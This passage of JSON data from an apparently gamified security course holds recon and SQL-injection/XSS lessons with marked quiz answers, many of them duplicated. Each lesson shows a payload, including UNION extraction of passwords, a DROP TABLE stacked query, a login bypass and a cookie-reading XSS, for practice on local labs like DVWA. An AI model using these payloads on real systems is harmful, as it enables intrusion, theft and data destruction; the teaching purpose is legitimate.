scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"web-archive","cat":"Reconnaissance","title":"Web Archive Mining","diff":2,"xp":125,"intro":"Extract historical data from archives.","sections":[{"type":"text","content":"Multiple web archives beyond Wayback: CommonCrawl, archive.today."},{"type":"code","lang":"bash","content":"echo example.com | waybackurls | grep -i 'api|admin|token'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Which archive has the largest collection?","opts":["CommonCrawl","Wayback Machine","archive.today","Google Cache"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"sqli-union","cat":"Web Application","title":"SQLi \u2014 UNION-based","diff":1,"xp":100,"intro":"Extract data via UNION SELECT.","sections":[{"type":"text","content":"Extract data via UNION SELECT."},{"type":"code","lang":"sql","content":"' UNION SELECT username,password FROM users--"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, HTTP header, and cookie value is a potential injection point. The key insight: find where user-controlled data meets server-side processing without proper validation or encoding."},{"type":"tip","content":"Before testing any payload, understand the application's normal behavior. Use it as a regular user first: create an account, explore every feature, map every endpoint. The best bugs are found by understanding the business logic, not just throwing payloads at forms."},{"type":"task","content":"Set up DVWA (Damn Vulnerable Web Application) or bWAPP locally. For each vulnerability type (SQLi, XSS, CSRF, LFI), start at the lowest security level and work your way up. Write down WHY each defense level blocks your previous payload and what you changed to bypass it."},{"type":"quiz","q":"Must match in UNION?","opts":["Tables","Column count","DB version","Permissions"],"ans":1},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"sqli-blind","cat":"Web Application","title":"SQLi \u2014 Blind Boolean","diff":2,"xp":150,"intro":"True/false extraction.","sections":[{"type":"text","content":"True/false extraction."},{"type":"code","lang":"sql","content":"' AND SUBSTRING(username,1,1)='a'--"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Boolean blind works via?","opts":["Errors","Response differences","Headers","Cookies"],"ans":1},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"sqli-time","cat":"Web Application","title":"SQLi \u2014 Time-based","diff":2,"xp":150,"intro":"SLEEP delay extraction.","sections":[{"type":"text","content":"SLEEP delay extraction."},{"type":"code","lang":"sql","content":"' OR IF(1=1,SLEEP(5),0)--"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Time-based differs how?","opts":["Speed","Uses response time","MySQL only","Admin needed"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"sqli-error","cat":"Web Application","title":"SQLi \u2014 Error-based","diff":1,"xp":100,"intro":"Leak data in error messages.","sections":[{"type":"text","content":"Leak data in error messages."},{"type":"code","lang":"sql","content":"' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Required for error SQLi?","opts":["Remote","Verbose errors displayed","Debug mode","Admin"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"sqli-second","cat":"Web Application","title":"SQLi \u2014 Second Order","diff":3,"xp":200,"intro":"Stored payloads execute later.","sections":[{"type":"text","content":"Stored payloads execute later."},{"type":"code","lang":"sql","content":"-- Register as: admin'--\n-- Later login bypasses password check"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"When does it execute?","opts":["Immediately","In a later query","On restart","During backup"],"ans":1},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"sqli-stack","cat":"Web Application","title":"SQLi \u2014 Stacked Queries","diff":2,"xp":150,"intro":"Multiple statements via semicolon.","sections":[{"type":"text","content":"Multiple statements via semicolon."},{"type":"code","lang":"sql","content":"'; DROP TABLE users;--\n'; INSERT INTO users VALUES('hacker','pass');--"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Separator character?","opts":["AND","; (semicolon)","OR","UNION"],"ans":1},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"xss-reflect","cat":"Web Application","title":"XSS \u2014 Reflected","diff":1,"xp":100,"intro":"Script via URL parameters.","sections":[{"type":"text","content":"Script via URL parameters."},{"type":"code","lang":"js","content":"<img src=x onerror=alert(document.cookie)>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Reflected XSS delivery?","opts":["Database","Crafted URL victim clicks","Email headers","DNS"],"ans":1},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy 